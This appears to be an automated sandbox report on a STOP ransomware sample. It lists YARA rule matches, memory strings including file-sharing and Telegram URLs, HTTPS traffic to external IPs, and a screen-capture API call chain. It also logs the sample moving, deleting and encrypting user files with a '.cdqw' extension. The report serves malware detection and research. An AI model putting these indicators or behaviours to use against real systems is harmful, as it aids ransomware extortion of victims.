                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000002.2903240410.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000002.2369052197.0000000003610000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://we.tl/t-99MNqXMr
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000002.2903240410.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000002.2903240410.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000002.2903240410.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2050797457.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000002.2369105544.0000000003634000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2360803674.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2359472467.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000002.2362281614.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2360926908.0000000003633000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://we.tl/t-99MNqXMrdS
                Source: build2.exe, 00000005.00000003.1757407833.0000000000715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                Source: unknown. Network traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknown. Network traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknown. Network traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknown. Network traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknown. Network traffic detected: HTTP traffic on port 443 -> 49762
                Source: unknown. Network traffic detected: HTTP traffic on port 49729 -> 443
                Source: unknown. Network traffic detected: HTTP traffic on port 49762 -> 443
                Source: unknown. Network traffic detected: HTTP traffic on port 49745 -> 443
                Source: unknown. Network traffic detected: HTTP traffic on port 443 -> 49729
                Source: unknown. Network traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknown. Network traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknown. Network traffic detected: HTTP traffic on port 443 -> 49745
                Source: unknown. HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49729 version: TLS 1.2
                Source: unknown. HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknown. HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknown. HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49736 version: TLS 1.2
                Source: unknown. HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49745 version: TLS 1.2
                Source: unknown. HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49762 version: TLS 1.2
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00C122E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC,0_2_00C122E0
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crlJump to dropped file

                Spam, unwanted Advertisements and Ransom Demands

                Source: Yara matchFile source: Process Memory Space: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe PID: 7596, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe PID: 7608, type: MEMORYSTR
                Source: Yara matchFile source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, type: SAMPLE
                Source: Yara matchFile source: 10.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.1662696538.0000000003391000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.1667079139.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1921214760.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000000.1797777128.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.1666176128.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000000.1910389769.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.1646052192.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1841955191.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe PID: 7496, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe PID: 7596, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe PID: 7608, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe PID: 7872, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe PID: 7256, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\tmp3BC7.tmp, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, type: DROPPED
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile moved: C:\Users\user\Desktop\WKXEWIOTXI.pngJump to behavior
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile deleted: C:\Users\user\Desktop\WKXEWIOTXI.pngJump to behavior
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile moved: C:\Users\user\Desktop\XZXHAVGRAG\XZXHAVGRAG.docxJump to behavior
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile deleted: C:\Users\user\Desktop\XZXHAVGRAG\XZXHAVGRAG.docxJump to behavior
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile moved: C:\Users\user\Desktop\NWTVCDUMOB.pdfJump to behavior
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt -> decryption settings;change encryption settings"}},{"system.parsingname":{"type":12,"value":"aaa_settingspagedevices.settingcontent-ms"},"system.setting.fontfamily":{"type":12,"value":"segoe mdl2 assets"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagedevices"},"system.comment":{"type":12,"value":"bluetooth and other devices settings"},"system.highkeywords":{"type":12,"value":"device;projector;projectors;pair bluetooth device;unpair device;pair device;bluetooth settings;add bluetooth device;add device"}},{"system.parsingname":{"type":12,"value":"aaa_settingspagedevicespen-2.settingcontent-ms"},"system.setting.fontfamily":{"type":12,"value":"segoe mdl2 assets"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagedevicespen"},"system.comment":{"type":12,"value":"pen and windows ink settings"},"system.highkeywords":{"type":12,"value":"pens;handedness;cursor;cursors;writing;write;workspace;pen shortcuts;hJump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-03_114932_b84-2220.log entropy: 7.99321923661Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440007v3.xml entropy: 7.99633858861Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440002v9.xml entropy: 7.99567442479Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-1157.log entropy: 7.99855650994Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Temp\msedge_installer.log entropy: 7.99165453497Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Temp\offline.session64 entropy: 7.99743314954Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt entropy: 7.99234497Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408903214673664.txt entropy: 7.99809526657Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408903167889885.txt entropy: 7.99827685285Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408906620712704.txt entropy: 7.99850087943Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408906321630689.txt entropy: 7.99821120979Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408904996229952.txt entropy: 7.99826195763Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json entropy: 7.99874475923Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133495120919029457.txt entropy: 7.99841423364Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408945543294083.txt entropy: 7.99854993362Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408908224609935.txt entropy: 7.99834229688Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408907975188232.txt entropy: 7.99836327726Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite entropy: 7.99852243716Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl entropy: 7.99737886946Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db entropy: 7.99371005985Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings_2.0-2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1 entropy: 7.99863276955Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log entropy: 7.99747232056Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Safety\edge\remote\script_300161259571223429446516194326035503227.rel.v2 entropy: 7.99799085794Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Safety\shell\remote\script_96032244749497702726114603847611723578.rel.v2 entropy: 7.99421423672Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin entropy: 7.99720082395Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\Local Settings\Temp\DESKTOP-AGET0TR-20231004-1157.log.cdqw (copy) entropy: 7.99855650994Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\Local Settings\Temp\msedge_installer.log.cdqw (copy) entropy: 7.99165453497Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\Local Settings\Temp\offline.session64.cdqw (copy) entropy: 7.99743314954Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe File created: C:\Users\user\Local Settings\Temp\wct150C.tmp.cdqw (copy) entropy: 7.99761668624
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe File created: C:\Users\user\Local Settings\Temp\wct33D7.tmp.cdqw (copy) entropy: 7.99700832208
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe File created: C:\Users\user\Local Settings\Temp\wct38F0.tmp.cdqw (copy) entropy: 7.99714508999
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe File created: C:\Users\user\Local Settings\Temp\wct443C.tmp.cdqw (copy) entropy: 7.99733602304
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe File created: C:\Users\user\Local Settings\Temp\wct49A7.tmp.cdqw (copy) entropy: 7.99726929872
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe File created: C:\Users\user\Local Settings\Temp\wctAB5F.tmp.cdqw (copy) entropy: 7.99726280694
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe File created: C:\Users\user\Local Settings\Temp\wctDB2E.tmp.cdqw (copy) entropy: 7.99709667516
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe File created: C:\Users\user\Local Settings\Temp\wctE4A4.tmp.cdqw (copy) entropy: 7.99758461474
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe File created: C:\Users\user\Local Settings\Temp\wctEA40.tmp.cdqw (copy) entropy: 7.99721134729
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe File created: C:\Users\user\Local Settings\Temp\wctF411.tmp.cdqw (copy) entropy: 7.99781021242
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe File created: C:\Users\user\Local Settings\Temp\acrobat_sbx\acroNGLLog.txt.cdqw (copy) entropy: 7.99234497
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe File created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache64.bin.cdqw (copy) entropy: 7.99720082395
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 entropy: 7.99553172716

                System Summary

                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, type: SAMPLE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, type: SAMPLE Matched rule: Detects STOP ransomware Author: ditekSHen
                Source: 10.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 10.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
                Source: 2.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 2.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
                Source: 10.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 10.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
                Source: 3.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 3.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
                Source: 0.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 0.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
                Source: 6.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 6.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
                Source: 6.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 6.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
                Source: 2.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 2.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
                Source: 0.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 0.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
                Source: 3.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 3.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
                Source: 00000000.00000003.1662696538.0000000003391000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000002.00000000.1666073748.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000003.00000000.1667079139.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000000.00000000.1645947470.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 0000000A.00000002.1921214760.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 0000000A.00000002.1921120348.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000006.00000000.1797777128.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000006.00000002.1841882825.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000006.00000000.1797319331.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 0000000A.00000000.1910328345.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000003.00000000.1666987231.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
